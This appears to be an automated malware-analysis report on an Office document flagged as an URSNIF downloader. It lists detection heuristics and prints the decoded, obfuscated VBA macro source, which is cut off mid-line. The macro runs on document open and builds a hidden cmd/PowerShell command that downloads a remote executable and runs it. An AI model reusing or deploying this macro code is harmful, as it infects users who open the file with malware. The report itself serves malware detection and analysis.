Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function to execute a command. The script attempts to construct a complex command string, likely for downloading and executing a secondary payload. The ClamAV detection as 'Doc.Downloader.URSNIF-6729855-3' further supports its role as a downloader.
Heuristics (6)

- ClamAV: Doc.Downloader.URSNIF-6729855-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4597 bytes | e6d422b0443ddcc2c7b1e09bb4703ed302d68370e6021d281be8c4da9c50c18b |
Script preview (first 1,000 lines of the extracted script):
```vb
Attribute VB_Name = "JmmtciF"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Shell Format(hfAoGiJ) + wUwQNzcIcIfCXZ + nSfVpLN + juCzi + KEhViw + wdCLVIFzT + mmRkEMcmnhKF, vbHide
End Sub
Attribute VB_Name = "iSPdhHkG"
Function juCzi()
On _
Error _
Resume _
Next
Month "UpmbmZpnA" + "6766"
Month "7083" + "wJ" + "7945" + "3124"
Month "4157" + "Y" + "qqi" + "Vij"
Month "9790" + "lToM"
Month "c" + "F"
MqCjRwG = Chr(4 + 10 + 15 + 2 + 68) + "md" + " /V" + ":/" + Chr(3 + 7 + 10 + 2 + 45) + Chr(1 + 3 + 4 + 0 + 26) + "s^e^t " + "9^" + "P=^ ^" + " ^ " + " ^ " + " ^ ^ " + "^ ^ ^" + " ^ }"
Month "hOMnHhn" + "ptBSpPETPY" + "T" + "aiWo"
Month "190699170" + "CvGk"
Month "An" + "3996" + "5077" + "286688474"
RpnhfkiKc = "^}^{h" + Chr(4 + 10 + 15 + 2 + 68) + "^" + "t" + "a" + Chr(4 + 10 + 15 + 2 + 68) + "}^;" + "^k" + "a^er^" + "b^;" + "w^lK$" + " ^me^tI" + "^-" + "^ekovn^" + "I^;" + ")^w^l"
Month "oDfGXzRjT" + "vJl" + "RzwHjp" + "QjkmiIjEp"
Month "vTjAnjD" + "4839"
Month "9050" + "511157874" + "I" + "262338199"
wJwQrVFUwid = "K^" + "$^ ^," + "^i^au" + "$(e" + "^liF" + "^da^o^l" + "n^wo^D" + ".^"
Month "4792" + "lV" + "48900262" + "D"
Month "j" + "286974041" + "hzXU" + "1314"
Month "ookb" + "HKOSzQKQ"
djzUsiklE = "i" + Chr(4 + 10 + 15 + 2 + 68) + "^" + "G$^{yr" + "t{)^K" + "^sV" + "^" + "$^ n^i^" + " ^i^a" + "u$(^h" + Chr(4 + 10 + 15 + 2 + 68) + "^aero" + "^f"
Month "qtUdBNFdom" + "498" + "zNVM" + "sMOzUh"
Month "w" + "DFmFn"
Month "zHiA" + "TbiH" + "472669434" + "rLMAwlkRDoz"
WMACKw = ";'e^xe" + "^.^'+D^" + "f" + "^" + "Q^$^+" + "'\'^+" + Chr(4 + 10 + 15 + 2 + 68) + "il^bup"
Month "5969" + "414592477"
Month "j" + "643"
Month "15831636" + "zq" + "207549787" + "zRFQNifatn"
tkAEknLmnLA = ":vne^" + "$=" + "^w^l" + "K^$" + ";^'1" + "^9^3'^ "
Month "503493470" + "251520882"
Month "4251" + "228956468"
uNIda = "=^ ^DfQ" + "^$^;)" + "^'" + "@'(" + "t^il"
juCzi = MqCjRwG + RpnhfkiKc + wJwQrVFUwid + djzUsiklE + WMACKw + tkAEknLmnLA + uNIda
Month "WGUBnjo" + "1033" + "jwiokpRiQDruG" + "4155"
Month "1926" + "RzzYn" + "iki" + "oiOCb"
Month "1368" + "DEqKBjC" + "wQ" + "HCfo"
Month "dL" + "PDrqDWj" + "rKCi" + "9644"
End Function
Function KEhViw()
On _
Error _
Resume _
Next
Month "350544414" + "350311002"
Month "388659103" + "zTANAHiCF" + "4625" + "lN"
Month "iO" + "498958133" + "wsqA" + "i"
hdPlkzw = "p^S" + "^.^'nkt" + "^.9b^" + "k^o^=^l" + "^?p^" + "h^p." + "^t^ok^s" + "na"
Month "V" + "dVj"
Month "645" + "inEQkwR"
YzRDvMWFFpC = "p" + "^o/^TT" + "R/^mo" + Chr(4 + 10 + 15 + 2 + 68) + ".^" + "7" + "h^" + "te^6"
Month "MwKWOjo" + "23106801"
Month "ZjoC" + "526028289" + "jjazH" + "a"
Month "ja" + "1400"
Month "oftz" + "1600"
jpDfa = "^jm^jd" + "^1wtr" + "^y//^:" + "p" + "tth'" + "^" + "=^KsV" + "^$^;t"
Month "SYJiHYomZz" + "os"
Month "t" + "ibraOzKRqSljt"
Month "qzfmioY" + "hnhJ" + "cHIsCMWH" + "337144930"
Month "iwkz" + "DRvoK" + "QEv" + "267085738"
sTdXkOWvQs = "nei" + "l" + Chr(3 + 7 + 10 + 2 + 45) + "^b^" + "eW^.^" + "t^eN^ t" + Chr(4 + 10 + 15 + 2 + 68) + "^ejb" + "o^-^w^e" + "n=i" + Chr(4 + 10 + 15 + 2 + 68) + "^" + "G$ ^l^" + "l^e^hsr" + "^ew^" + "o"
Month "BnzqJ" + "462456220" + "343427415" + "QstziLDN"
Month "353240879" + "TccIdDjm"
Month "MwJH" + "96352812"
LndZRbnNER = "^p&" + "&^f^or " + "/^L " + "%^Q ^in" + " (^" + "26^3;" + "^-" + "^1;"
Month "380849459" + "b" + "70822146" + "HLCkoKwh"
Month "407717244" + "zOdVrM"
CvwQoW = "^0)d^" + "o" + " " + "se^t ^" + "4r^B" + "=" + "!^4r^B!"
Month "390950992" + "zzEKDMdSilhzAb"
Month "hQro" + "iWTT" + "8106062" + "ijdR"
Month "215383337" + "144572651" + "823" + "6418"
zZYbI = "!9" + "^P:" + "~%^Q,1!" + "&" + "&^if %^"
Month "299703056" + "c"
Month "2036" + "
```

... (truncated)